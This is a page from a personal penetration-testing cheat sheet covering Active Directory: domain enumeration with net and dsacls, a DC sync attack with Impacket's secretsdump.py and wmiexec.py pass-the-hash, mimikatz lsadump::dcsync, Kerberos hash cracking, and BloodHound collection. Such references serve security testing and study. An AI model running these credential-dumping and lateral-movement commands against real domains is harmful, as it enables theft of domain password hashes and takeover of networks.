d4Rk's 1337 h4x0r guide
About me
Search…
Introduction
Reconnaissance
Recon
OSINT
Enumeration
Network discovery
Port scanning
Webserver scanning
Exploit detection
Fuzzing
Process monitoring
Exploitation
Shells
Passwords
Web
Buffer overflow
Misc
Privilege escalation
Linux
Windows
Post exploitation
Loot
Pivoting
Standalone Tools
Services
TCP
UDP
Misc
Active Directoy
Apache Tomcat
Drupal
H2 Databases
IIS
IPsec
IRC
Java Applets
Java RMI
Jenkins
Joomla
Oracle
PHP
SharePoint
WordPress
File transfer
Overview
Wget
Pure-FTPd
TFTP
VBScript: Wget clone
Misc
Bash
Burp Suite
Crypto
Ebowla
Firefox extensions
Impacket
Memory forensics
Metasploit Framework (MSF)
MITM
Msfvenom
Pass the Hash (PTH)
PowerShell
PowerShell on Linux
Wireshark
Wordlists and dictionaries
Bug Bounty
Platforms
Tools
Powered By GitBook
Active Directoy
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.
-- Wikipedia​

Related

Target

  • Domain Admins group
  • Domain Controller

General

Display permissions using PowerShell
dsacls "DC=<domain>,DC=<domain>"

net

List local accounts
net user
List domain accounts
net user /domain
Details about specific user
net user <user> /domain
List domain groups
net group /domain
Show domain's account policy
net accounts

DC sync attack

secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"
Alternative approach (probably gets flagged by AV) Copy & execute mimikatz.exe on DC
lsadump::dcsync

Pre-Auth attack

​Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube 1. sniff KRB auth packet 2. crack using hashcat
-> If no pre auth is required, just use Impacket to pull hashes from AD.

BloodHound

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. GitHub - BloodHoundAD/BloodHound​

Gather information (on target)

pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All
OR
.\SharpHound.exe -c all -d <domain> --domain-controller <dc-ip>
Copy generated *BloodHound.zip
OR
SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>

Analyze data (on kali)

neo4j console
bloodhound
Connect to database
bolt://localhost:7687
neo4j
<PW>
Import data Upload Data select .csv, .json or .zip file(s)
Services - Previous
Misc
Next
Apache Tomcat
Last modified 5mo ago
Copy link
Edit on GitHub
Outline
Related
Target
General
net
DC sync attack
Pre-Auth attack
BloodHound
Gather information (on target)
Analyze data (on kali)